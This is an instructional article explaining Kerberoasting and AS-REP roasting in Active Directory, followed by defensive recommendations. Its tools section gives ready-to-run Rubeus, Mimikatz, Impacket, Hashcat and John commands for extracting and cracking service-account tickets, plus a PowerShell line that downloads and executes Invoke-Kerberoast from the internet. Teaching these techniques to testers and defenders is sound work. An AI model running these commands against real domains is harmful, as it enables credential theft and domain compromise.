Introduction
Kerberoasting has emerged as one of the most prevalent attack techniques targeting service accounts in modern Windows networks. Its effectiveness stems from the way the Kerberos authentication protocol operates: service tickets are encrypted using the hash of the target account’s password. Attackers with even low-level domain access can exploit this feature to request service tickets for accounts linked to Service Principal Names (SPNs), retrieve the encrypted tickets, and crack their passwords offline using specialized tools. The stealth of Kerberoasting makes it difficult to detect in real time, because much of the attack process—especially password cracking—occurs outside the visibility of the network or security monitoring solutions. The primary risk with Kerberoasting lies in its potential to grant attackers access to high-privilege service accounts. In many organizations, these accounts run mission-critical services such as databases, web applications, and management platforms, often with elevated privileges far beyond those of standard users. Compromise of a single service account through Kerberoasting can lead to wide-ranging access across enterprise assets, enabling lateral movement, data exfiltration, persistence, and further privilege escalation. The attack does not rely on exploiting vulnerabilities in Kerberos itself, but rather takes advantage of suboptimal password policies and legacy encryption standards that leave service accounts exposed.
A deep understanding of Kerberoasting is essential for both penetration testers seeking to assess risks and blue teams tasked with hardening Active Directory. Knowledge of Kerberoasting techniques helps security professionals implement focused detection strategies, enforce strong password controls, transition from vulnerable encryption protocols, and proactively hunt for attack indicators within network logs. As networks evolve and attackers refine their skills, mastering Kerberoasting defense is a critical competency for cyber resilience in any organization relying on Active Directory authentication.
Learning Objectives
- Explain the process and risks associated with Kerberoasting attacks
- Identify tools used for Kerberoasting and Kerberos account exploitation.
- Highlight defensive strategies to prevent and detect Kerberoasting incidents.
- Demonstrate the typical workflow of an AS-REP Kerberoasting attack.
What is Kerberoasting Attack?
Kerberoasting is a post-exploitation attack technique that targets the Kerberos authentication protocol used in Windows Active Directory environments. The attack specifically exploits Service Principal Names (SPNs), which are unique identifiers associated with service accounts that allow Kerberos to authenticate users into specific services such as SQL Server, IIS web servers, Exchange, or other enterprise applications. When an attacker compromises any domain user account—even one with minimal privileges—they can leverage the Kerberos ticketing system to request service tickets for accounts registered with SPNs. The Key Distribution Center (KDC), which is typically a domain controller, responds to these requests by issuing Ticket Granting Service (TGS) tickets encrypted with a hash derived from the service account’s password. The core vulnerability that Kerberoasting exploits lies in the encryption mechanism of these service tickets. Unlike machine accounts, which use long, randomly generated passwords that are automatically rotated, service accounts running under user credentials frequently rely on human-selected passwords. These passwords are often weaker, shorter, and remain unchanged for extended periods—sometimes years. Once an attacker obtains the encrypted TGS ticket, they can extract it from memory or network traffic and take it completely offline for password cracking attempts. This offline nature is what makes Kerberoasting particularly dangerous: the attacker operates outside the network perimeter, beyond the reach of intrusion detection systems, account lockout policies, and real-time monitoring tools.
The attack process follows a methodical sequence that requires minimal technical sophistication once domain access is achieved. First, the attacker enumerates the Active Directory environment to identify accounts with registered SPNs—this reconnaissance can be performed using built-in Windows utilities or specialized tools. Next, they request TGS tickets for the identified service accounts using their compromised domain credentials. The domain controller, operating under normal Kerberos protocol rules, issues the requested tickets without suspicion because requesting service tickets is a legitimate and common operation in enterprise networks. The attacker then extracts these encrypted tickets and employs powerful password-cracking tools such as Hashcat or John the Ripper, often leveraging GPU acceleration to test billions of password combinations per second.Once the service account password is successfully cracked, the attacker gains the ability to authenticate as that service account across the network. This access typically grants elevated privileges that far exceed those of standard user accounts, enabling the attacker to access sensitive databases, administrative interfaces, file shares, and other critical resources. From this position, threat actors can perform lateral movement to compromise additional systems, escalate privileges further by targeting administrator accounts, exfiltrate sensitive data, deploy ransomware or other malware, and establish persistent backdoors that allow long-term access even after the initial compromise vector is remediated.
Key characteristics that make Kerberoasting particularly effective include:
- Low privilege requirements: Attackers do not need administrative privileges—any authenticated domain user can launch this attack, making it accessible even after initial compromise of low-value accounts.
- Stealth and evasion: Offline password cracking avoids detection by traditional security controls, network monitoring systems, and account lockout policies that would typically trigger alerts during online brute-force attempts.
- High-value targets: Service accounts often possess elevated privileges such as local administrator rights, database administrator access, or domain-level permissions, making them extremely valuable for privilege escalation and lateral movement.
- Legitimate protocol abuse: The attack leverages normal Kerberos functionality rather than exploiting software vulnerabilities, making it difficult to distinguish malicious ticket requests from legitimate service authentication without advanced behavioral analytics.
How Kerberoasting Works?
Kerberoasting follows a methodical attack chain that exploits the inherent trust relationships within Active Directory and the Kerberos authentication protocol. The attack begins with initial access to the domain, which can be achieved through various means including phishing campaigns that capture user credentials, credential stuffing attacks leveraging previously breached passwords, exploitation of vulnerabilities in internet-facing applications, or social engineering tactics. Unlike many sophisticated attacks that require elevated privileges from the outset, Kerberoasting can be initiated by any authenticated domain user, regardless of their permission level. This low barrier to entry makes it an attractive option for attackers who have gained even minimal foothold within an organization’s network. Once domain access is established, the attacker proceeds to the reconnaissance phase, specifically targeting Service Principal Names (SPNs) registered within Active Directory. SPNs are unique identifiers that map services to the accounts under which they run, allowing Kerberos to properly route authentication requests. Attackers can enumerate SPNs using various built-in Windows commands such as setspn.exe, PowerShell cmdlets like Get-ADUser, or specialized penetration testing tools. This enumeration reveals which user accounts are associated with services—typically high-value targets such as Microsoft SQL Server instances, Exchange mail servers, web applications running under IIS, SharePoint services, and custom enterprise applications. The enumeration process generates minimal suspicious activity since querying Active Directory is a common administrative task.
With a list of vulnerable service accounts identified, the attacker leverages their domain credentials to request Ticket Granting Service (TGS) tickets for each target SPN. This request is sent to the Key Distribution Center (KDC), which is typically hosted on a domain controller. The KDC validates the requester’s credentials and, following standard Kerberos protocol, issues a TGS ticket encrypted with the NTLM hash of the service account’s password. Critically, the KDC does not verify whether the requester has legitimate business need to access the service—it simply fulfills the request as part of normal authentication flow. This design characteristic is what makes Kerberoasting possible: any domain user can request tickets for any service account without triggering immediate security alerts. The ticket extraction phase involves capturing these encrypted TGS tickets for offline analysis. Tickets can be extracted directly from memory using tools like Mimikatz, which reads Kerberos ticket caches from the Local Security Authority Subsystem Service (LSASS) process. Alternatively, specialized tools such as Rubeus (a C# implementation) or Impacket’s GetUserSPNs.py (Python-based) can automate both the ticket request and extraction process, outputting the encrypted hashes in formats suitable for password cracking tools. These tickets contain the service account’s password hash wrapped in Kerberos encryption, typically using either RC4-HMAC (encryption type 23) or AES256-CTS-HMAC-SHA1-96 (encryption type 18), with RC4 being significantly easier to crack due to its computational simplicity.
Once extracted, the encrypted tickets are taken completely offline where the attacker attempts to crack the password hash using brute-force or dictionary-based attacks. Tools like Hashcat and John the Ripper are purpose-built for this task, supporting Kerberos 5 TGS-REP hash formats (mode 13100 for RC4 and mode 19700 for AES256 in Hashcat). Modern GPU-accelerated cracking rigs can test billions of password candidates per second against RC4-encrypted tickets, with weaker passwords falling within minutes or hours. Even strong passwords can eventually be compromised given sufficient time and computational resources, particularly if they follow predictable patterns or appear in common password databases. The offline nature of this phase is what makes Kerberoasting so difficult to detect—no authentication failures are generated, no account lockouts occur, and the attacker operates entirely outside the network’s visibility. Upon successfully cracking the service account password, the attacker gains the ability to authenticate as that account throughout the domain. This access typically comes with elevated privileges that enable multiple post-exploitation activities: lateral movement to additional systems where the service account has permissions, privilege escalation by targeting accounts with domain administrator rights, data exfiltration from databases and file shares accessible to the compromised account, deployment of persistence mechanisms such as scheduled tasks or service modifications, and creation of additional backdoor accounts to maintain access. The compromised service account becomes a launching point for deeper network penetration, often leading to complete domain compromise if the account possesses sufficient privileges or can be used as a stepping stone to more powerful credentials.
The complete Kerberoasting attack workflow:
- Account Compromise: Attackers obtain any domain user credential through phishing campaigns, credential stuffing attacks using leaked password databases, exploitation of publicly accessible vulnerabilities, or social engineering tactics targeting employees.
- SPN Enumeration: The attacker scans Active Directory for accounts with registered Service Principal Names using tools like
setspn.exe, PowerShell cmdlets, or automated frameworks—these accounts typically run mission-critical services such as MSSQL databases, Exchange mail servers, SharePoint portals, or web applications. - Ticket Request: The attacker uses their compromised domain credential to request Kerberos Ticket Granting Service (TGS) tickets for the identified SPN accounts, with the domain controller issuing tickets as part of normal Kerberos authentication flow without additional authorization checks.
- Ticket Extraction: TGS tickets are extracted from memory using credential dumping tools like Mimikatz, or directly requested and captured using specialized frameworks such as Rubeus or Impacket’s GetUserSPNs.py, which output the encrypted hashes in crackable formats.
- Offline Cracking: The extracted encrypted hashes are taken completely offline and subjected to brute-force or dictionary attacks using GPU-accelerated password cracking tools like Hashcat or John the Ripper, revealing the plaintext password for the service account.
- Privilege Escalation: With valid service account credentials in hand, attackers authenticate as the compromised account to escalate their privileges, move laterally to additional systems, access sensitive resources, establish persistence mechanisms, and potentially achieve complete domain compromise.
Tools and Techniques to Perform Kerberoasting and AS-REP Roasting Attacks
The offensive security community has developed a comprehensive arsenal of tools specifically designed to automate and streamline Kerberoasting and AS-REP roasting attacks. These tools range from Windows-native utilities that leverage built-in functionality to sophisticated frameworks that handle every stage of the attack chain. Understanding these tools is essential for both red team operators conducting authorized penetration tests and blue team defenders who need to recognize attack signatures and implement appropriate detection mechanisms. The tools discussed below represent the most widely adopted solutions in modern Active Directory assessments.
Rubeus:
Stands as one of the most powerful and versatile Kerberos attack tools available to penetration testers. Written in C#, Rubeus is designed to run natively on Windows systems without requiring PowerShell or external dependencies, making it ideal for post-exploitation scenarios where operational security is paramount. The tool provides comprehensive functionality for Kerberos ticket manipulation, including ticket requests, renewals, forgery, and extraction. For Kerberoasting specifically, Rubeus can automatically enumerate all accounts with SPNs, request service tickets, and export the encrypted hashes in formats compatible with password cracking tools. The tool supports multiple output formats including John the Ripper and Hashcat, and can target specific users or request tickets for all vulnerable accounts in a single execution.
# Basic Kerberoasting with Rubeus
Rubeus.exe kerberoast /outfile:hashes.kerberoast
# Target specific user account
Rubeus.exe kerberoast /user:serviceaccount /outfile:service_hash.txt
# Request tickets with specific encryption type
Rubeus.exe kerberoast /tgtdeleg
# Kerberoast with alternative credentials
Rubeus.exe kerberoast /creduser:DOMAIN\username /credpassword:password
Mimikatz:
Remains one of the most iconic tools in offensive security, renowned for its credential dumping capabilities but also highly effective for Kerberos ticket extraction. Written by Benjamin Delpy, Mimikatz can interact directly with the Local Security Authority Subsystem Service (LSASS) process to extract Kerberos tickets from memory, including TGT and TGS tickets. While not specifically designed for automated Kerberoasting like Rubeus, Mimikatz excels at extracting tickets that have already been requested, making it valuable in scenarios where tickets are cached in memory. The tool can export tickets in various formats and supports ticket injection for pass-the-ticket attacks following successful Kerberoasting
# Extract all Kerberos tickets from memory
mimikatz # sekurlsa::tickets /export
# List available Kerberos tickets
mimikatz # kerberos::list
# Request and cache TGS ticket for specific SPN
mimikatz # kerberos::ask /target:MSSQLSvc/server.domain.local
Hashcat and John the Ripper:
represent the industry-standard password cracking tools used in the final stage of Kerberoasting attacks. Hashcat, developed by Jens Steube, is renowned for its GPU acceleration capabilities, allowing attackers to leverage powerful graphics cards to test billions of password candidates per second. The tool supports multiple attack modes including dictionary attacks, combinator attacks, rule-based attacks, and brute-force attacks. For Kerberoasting, Hashcat uses mode 13100 for RC4-encrypted tickets (Kerberos 5 TGS-REP etype 23) and mode 19700 for AES256-encrypted tickets (Kerberos 5 TGS-REP etype 18). RC4 hashes crack significantly faster than AES256 due to computational differences, with modern GPUs achieving cracking speeds of 10-50 billion hashes per second for RC4 compared to only millions per second for AES256
# Crack RC4-encrypted Kerberos tickets with Hashcat
hashcat -m 13100 -a 0 hashes.kerberoast /usr/share/wordlists/rockyou.txt
# Crack AES256-encrypted tickets
hashcat -m 19700 -a 0 hashes.kerberoast /usr/share/wordlists/rockyou.txt
# Use rules to generate password variations
hashcat -m 13100 -a 0 hashes.kerberoast wordlist.txt -r rules/best64.rule
# Brute-force attack with mask
hashcat -m 13100 -a 3 hashes.kerberoast ?u?l?l?l?l?d?d?d?d
John the Ripper offers similar functionality with a focus on automatic detection and multi-algorithm support. While generally slower than Hashcat on GPU-accelerated systems, John excels at CPU-based cracking and provides excellent rule-based mutation engines for transforming dictionary words into likely password candidates.
# Crack Kerberos tickets with John the Ripper
john --format=krb5tgs hashes.txt --wordlist=rockyou.txt
# Use John's built-in rules for mutations
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt --rules=Jumbo
# Show cracked passwords
john --show --format=krb5tgs hashes.txtAS-REP Roasting:
Represents a related but distinct attack vector that targets accounts with Kerberos pre-authentication disabled. While standard Kerberoasting requires valid domain credentials to request service tickets, AS-REP Roasting can be performed without any authentication when targeting accounts that have the “Do not require Kerberos preauthentication” flag enabled. This configuration weakness allows attackers to request AS-REP responses for these accounts, which contain encrypted data that can be cracked offline similar to TGS tickets. The same tools (Rubeus, Impacket, Hashcat) support AS-REP Roasting with minor syntax modifications.
# AS-REP Roasting with Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
# AS-REP Roasting with Impacket (no credentials required)
impacket-GetNPUsers -dc-ip 192.168.1.10 DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep.txt
# AS-REP Roasting for specific user
impacket-GetNPUsers -dc-ip 192.168.1.10 DOMAIN/username -no-pass
# Crack AS-REP hashes with Hashcat (mode 18200)
hashcat -m 18200 -a 0 asrep_hashes.txt rockyou.txt
PowerShell-based techniques:
Also remain relevant, particularly in environments where compiled executables are blocked by application endpoint detection and response (EDR) solutions. Tools like Invoke-Kerberoast from the PowerSploit framework can be loaded directly into memory, leaving minimal forensic artifacts on disk.
# Import and execute Invoke-Kerberoast
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -OutputFormat Hashcat | fl
# Target specific accounts
Invoke-Kerberoast -Identity serviceaccount -OutputFormat JohnUnderstanding the technical capabilities, operational advantages, and forensic signatures of these tools enables security professionals to conduct thorough assessments, implement targeted detection strategies, and develop comprehensive defense-in-depth architectures that mitigate Kerberoasting risks across the entire attack chain.
Conclusion
Kerberoasting remains a potent and stealthy threat particularly against organizations with weak service account password policies and legacy Kerberos encryption standards. The attack’s persistence in the threat landscape stems from its fundamental exploitation of legitimate Kerberos functionality rather than software vulnerabilities, making it difficult to eliminate through patching alone. Organizations that continue to rely on RC4 encryption, maintain service accounts with weak or static passwords, and lack comprehensive monitoring of Kerberos authentication activity remain highly vulnerable to credential theft and privilege escalation through this attack vector. The widespread availability of sophisticated, user-friendly tools has lowered the technical barrier for executing Kerberoasting attacks, enabling even moderately skilled adversaries to compromise high-value service accounts and achieve domain-wide access. Effective defense against Kerberoasting requires a multi-layered approach that addresses the attack at every stage of its execution. Security teams must enforce strong, complex service account passwords exceeding 25 characters with regular rotation policies, or better yet, transition to Group Managed Service Accounts (gMSA) that provide automated password management with cryptographically secure, randomly generated credentials. Organizations should prioritize enabling AES-256 encryption for all Kerberos authentication, explicitly disable RC4 where possible, and audit Active Directory to identify and remediate accounts still using legacy encryption standards. Implementing the principle of least privilege for service accounts limits the potential impact of successful credential compromise, while regular SPN audits help identify orphaned or misconfigured service accounts that present unnecessary attack surface.
Monitoring and detection capabilities form the critical final layer of defense, enabling security teams to identify and respond to Kerberoasting attempts before attackers can successfully crack credentials. Organizations should enable comprehensive logging of Kerberos authentication events, particularly Event ID 4769 which records TGS ticket requests, and establish baseline behavioral analytics to detect anomalous patterns such as unusual volumes of service ticket requests from single accounts, requests for multiple SPNs in short timeframes, or ticket requests originating from suspicious source systems. Deploying honeypot service accounts with attractive names but no legitimate business purpose creates high-fidelity detection opportunities, as any interaction with these accounts definitively indicates malicious reconnaissance or exploitation activity. Security Information and Event Management (SIEM) platforms should be configured with correlation rules specifically designed to identify Kerberoasting indicators, while endpoint detection and response (EDR) solutions can monitor for the execution of known Kerberoasting tools such as Rubeus, Mimikatz, or suspicious PowerShell activity.
Awareness and preparation are the keys to defending against Kerberoasting and related ticket-roasting attacks in modern Active Directory environments. Security teams must maintain current threat intelligence on evolving Kerberoasting techniques, conduct regular penetration testing and red team exercises that include Kerberoasting scenarios, and develop comprehensive incident response playbooks that detail specific procedures for investigating and remediating these attacks. Training programs should educate IT administrators on the risks associated with service account misconfigurations, the importance of strong password policies, and the security advantages of modern account management solutions like gMSA. By combining strong preventive controls, robust detection capabilities, and organizational awareness, enterprises can significantly reduce their exposure to Kerberoasting and maintain the integrity of their Active Directory authentication infrastructure against this persistent and evolving threat.